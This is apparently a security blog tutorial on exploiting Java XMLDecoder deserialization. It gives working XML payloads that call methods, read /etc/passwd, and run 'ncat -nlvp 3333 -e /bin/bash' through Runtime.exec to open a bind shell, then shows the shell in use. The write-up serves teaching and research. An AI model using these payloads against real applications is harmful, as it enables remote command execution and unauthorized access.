This type of research is not new, it is rather old and I found few reference about it( check reference section). I thought it would be useful to add little more explanation and details about this type of attack as it is very less documented and I had spent a considerable amount of time on writing the various type of exploits other than those which I found online.
Exploiting this feature is relatively easy but tricker as you need to be creative in writing the exploit in XML style. You can stop here for a moment and have a closer look at the Javabean Persistence XML Scheme and how we can reconstruct object or call a function using the XML Scheme.
https://www.oracle.com/technical-resources/articles/java/persistence3.html
Now why did I mention ret2lib style. In some binary exploitation challenges we try to jump to the destination functions of our interest by redirecting to the function. Sometimes using the system() and passing some arguments in our exploit, we can run some system commands. Similarly our attack vectors will be based on using existing functions of the Class which is being currently invoked or some other functions of another Class in a different package.
So here is the code under attack.
If we execute the code , this is the output generated in beaninxml.xml
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_265" class="java.beans.XMLDecoder">
<object class="MyBean"/>
</java>
Now with the knowledge we received from reviewing the Javabeans Persistence XML Scheme, we will construct our payloads based on the above structure which will act as a template for our attack vectors.
Case 1: Calling a member function of a Class
We will try to call the function display1() which is in the MyBean Class. In our attacker controlled xml file ( exploit-base.txt ),we will try to add this code and execute.
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_265" class="java.beans.XMLDecoder">
<object class="MyBean">
<void method="display1" />
</object>
</java>
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_265" class="java.beans.XMLDecoder">
<object class="MyBean">
<void method="display2">
<string>I am passed via argument</string>
</void>
</object>
</java>
In this example we will try to call the readFile(File fileName) in MyBean. In our attacker controlled xml file ( exploit-base.txt ),we will try to add this code and execute.Here we are trying to abuse the readFile(File fileName) function to dump contents of /etc/passwd file. We need to pass a File type object to the function.
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_265" class="java.beans.XMLDecoder">
<object class="MyBean">
<void method="readFile">
<object class="java.io.File">
<string>/etc/passwd</string>
</object>
</void>
</object>
</java>
Case 4: Calling a function of different package
In this example we will try to call java.lang.Runtime.getRuntime().exec(String cmd). In our attacker controlled xml file ( exploit-base.txt ),we will try to add this code and execute.Here we will try to get a bind shell on the victim's machine. Please note we are not using the existing object types base xml scheme. The attack will still be successful even if you encounter the error message. This is because the error pops up when the type conversion happens and the exploit is triggered before that.
<?xml version="1.0" encoding="UTF-8" ?>
<java version="1.4.0" class="java.beans.XMLDecoder">
<object class="java.lang.Runtime" method="getRuntime">
<void method="exec">
<string>ncat -nlvp 3333 -e /bin/bash</string>
</void>
</object>
</java>
Output
Exception in thread "main" java.lang.ClassCastException: java.lang.Runtime cannot be cast to MyBean
at DemoExample.fromXML(DemoExample.java:37)
at DemoExample.main(DemoExample.java:12)
Then we go to command prompt and type
nc 127.0.0.1 3333
id
uid=1000(websec) gid=1000(websec) ... ... ...
Well that's it , I had learnt lot of things while doing this and I hope this will be useful to someone someday :)
- https://web.archive.org/web/20131016234737/http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html
- https://stackoverflow.com/questions/14307442/is-it-safe-to-use-xmldecoder-to-read-document-files
- https://github.com/o2platform/DefCon_RESTing/tree/c77474f2d063973c265f5b265af63fd3c5de44cc/Demos/XMLDecoderVuln/src/com/company
- https://github.com/pwntester/XMLDecoder